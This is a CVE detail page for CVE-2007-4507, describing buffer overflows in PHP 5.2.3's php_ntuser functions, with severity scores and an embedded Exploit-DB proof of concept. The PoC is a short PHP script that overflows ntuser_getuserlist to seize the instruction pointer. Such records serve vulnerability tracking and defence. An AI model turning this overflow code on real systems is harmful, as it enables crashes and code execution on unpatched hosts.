CVE-2007-4507 : Detail

CVE-2007-4507

0.4%V3
Network
2007-08-23
17h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple buffer overflows in the php_ntuser component for PHP 5.2.3 allow context-dependent attackers to cause a denial of service or execute arbitrary code via long arguments to the (1) ntuser_getuserlist, (2) ntuser_getuserinfo, (3) ntuser_getusergroups, or (4) ntuser_getdomaincontroller functions.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4304

Publication date : 2007-08-22 22h00 +00:00
Author : shinnai
EDB Verified : Yes

<?php //PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow //author: shinnai //mail: shinnai[at]autistici[dot]org //site: http://shinnai.altervista.org //greetz to BrainBugger Crew //http://www.brainbugger.altervista.org/ //Bug discovered with "Footzo" (thanks to rgod) modified. //To download Footzo: //original link: http://godr.altervista.org/index.php?mod=Download/useful_tools#footzo.rar //alternative: http://www.shinnai.altervista.org/index.php?mod=Download/Utilities#footzo.rar //also theese are vulnerable: //ntuser_getusergroups <-- DoS, we control EAX //ntuser_getdomaincontroller <-- DoS, we control EAX //ntuser_getuserinfo <-- BoF, we control EIP 00410041 //This is the content of registers: //EAX FFFFFFFE //ECX 00000754 //EDX 00000041 //EBX 00223D18 //ESP 00C0FB34 UNICODE "CCC... x 100" //EBP 00C0FBD0 UNICODE "CCC + DDD... x 100" //ESI 011AC4A8 //EDI 011ADC00 //EIP 00410041 $buff = str_repeat("\x41", 250); $get_EIP = "\x42\x42"; $get_ESP = str_repeat("\x43", 100); $get_EBP = str_repeat("\x44", 100); ntuser_getuserlist($buff.$get_EIP.$get_ESP.$get_EBP); ?> # milw0rm.com [2007-08-23]

Products Mentioned

Configuraton 0

Php>>Php >> Version 5.2.3

References

https://www.exploit-db.com/exploits/4304
Tags : exploit, x_refsource_EXPLOIT-DB